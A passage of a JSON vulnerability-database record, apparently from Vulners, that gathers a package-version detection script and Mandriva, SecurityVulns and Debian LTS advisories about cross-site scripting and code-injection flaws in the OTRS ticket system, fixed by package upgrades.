ver:\"3.3.18-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"otrs2\", ver:\"3.3.18-1~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-1695"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n 
_______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:054\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : otrs\r\n Date : March 13, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated otrs package fixes security vulnerability:\r\n \r\n An attacker could send a specially prepared HTML email to OTRS. If\r\n he can then trick an agent into following a special link to display\r\n this email, JavaScript code would be executed (CVE-2014-1695).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1695\r\n http://advisories.mageia.org/MGASA-2014-0114.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n f913ce8f777c607662375c4cd63995b3 mbs1/x86_64/otrs-3.2.15-1.mbs1.noarch.rpm \r\n cf451c6dc24d227df81f277d0542cb9e mbs1/SRPMS/otrs-3.2.15-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. 
You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFTIWA2mqjQ0CJFipgRAmAyAJ4soLFUh+CytH8YdDnszYsa26wzjwCghyCb\r\nIuQkiqLATAUUnFETQnEXFjk=\r\n=t1Xt\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-05T00:00:00", "published": "2014-05-05T00:00:00", "id": "SECURITYVULNS:DOC:30637", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30637", "title": "[ MDVSA-2014:054 ] otrs", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "cvelist": ["CVE-2013-6233", "CVE-2013-6231", "CVE-2014-2655", "CVE-2013-6429", "CVE-2012-2983", "CVE-2014-1879", "CVE-2014-1888", "CVE-2014-0053", "CVE-2014-2244", "CVE-2014-1206", "CVE-2014-1454", "CVE-2013-4152", "CVE-2014-2685", "CVE-2014-1216", "CVE-2014-2327", "CVE-2014-1224", "CVE-2014-2570", "CVE-2014-0097", "CVE-2014-2279", "CVE-2014-2332", "CVE-2014-1695", "CVE-2014-2280", "CVE-2014-2242", "CVE-2014-0054", "CVE-2012-2981", "CVE-2014-2330", "CVE-2014-2043", "CVE-2013-7106", "CVE-2012-2982", "CVE-2014-2682", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6234", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-5951", "CVE-2014-2243", "CVE-2012-4893", "CVE-2014-2035", "CVE-2014-2040", "CVE-2014-2331", "CVE-2013-7196", "CVE-2013-7195", "CVE-2013-6452", "CVE-2014-2531", "CVE-2014-2329", 
"CVE-2014-1471", "CVE-2014-2684", "CVE-2013-6232", "CVE-2014-2326", "CVE-2014-1904", "CVE-2013-6451", "CVE-2014-1455", "CVE-2014-2278", "CVE-2014-1223", "CVE-2014-1222", "CVE-2014-1889", "CVE-2014-1694", "CVE-2013-7108", "CVE-2014-2683", "CVE-2014-2328", "CVE-2014-2681"], "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "edition": 1, "modified": "2014-05-05T00:00:00", "published": "2014-05-05T00:00:00", "id": "SECURITYVULNS:VULN:13733", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13733", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:22:41", "bulletinFamily": "unix", "cvelist": ["CVE-2014-2554", "CVE-2014-1695", "CVE-2017-14635", "CVE-2014-2553"], "description": "Package : otrs2\nVersion : 3.3.18-1~deb7u1\nCVE ID : CVE-2014-1695 CVE-2014-2553 CVE-2014-2554\n CVE-2017-14635\nDebian Bug : 876462\n\nAn attacker who is logged into OTRS, a Ticket Request System, as an\nagent with write permissions for statistics can inject arbitrary code\ninto the system. This can lead to serious problems like privilege\nescalation, data loss, and denial of service. This issue is also known\nas CVE-2017-14635 and is resolved by upgrading to the latest upstream\nrelease of OTRS3.\n\n****IMPORTANT UPGRADE NOTES****\n===============================\n\nThis update requires manual intervention. We strongly recommend to\nbackup all files and databases before upgrading. 
If you use the MySQL\nbackend you should read Debian bug report #707075 and the included\nREADME.Debian file which will provide further information.\n\nIf you discover that the maintenance mode is still activated after the\nupdate, we recommend to remove /etc/otrs/maintenance.html and\n/var/lib/otrs/httpd/htdocs/maintenance.html which will resolve the issue\n.\n\nIn addition the following security vulnerabilities were also addressed:\n\nCVE-2014-1695\n Cross-site scripting (XSS) vulnerability in OTRS allows remote\n attackers to inject arbitrary web script or HTML via a crafted HTML\n email\n\nCVE-2014-2553\n Cross-site scripting (XSS) vulnerability in OTRS allows remote\n authenticated users to inject arbitrary web script or HTML via\n vectors related to dynamic fields\n\nCVE-2014-2554\n OTRS allows remote attackers to conduct clickjacking attacks via an\n IFRAME element\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.3.18-1~deb7u1.\n\nWe recommend that you upgrade your otrs2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-09-30T19:36:15", "published": "2017-09-30T19:36:15", "id": "DEBIAN:DLA-1119-1:89666", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00036.html", "title": "[SECURITY] [DLA 1119-1] otrs2 security update", "type": "debian", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}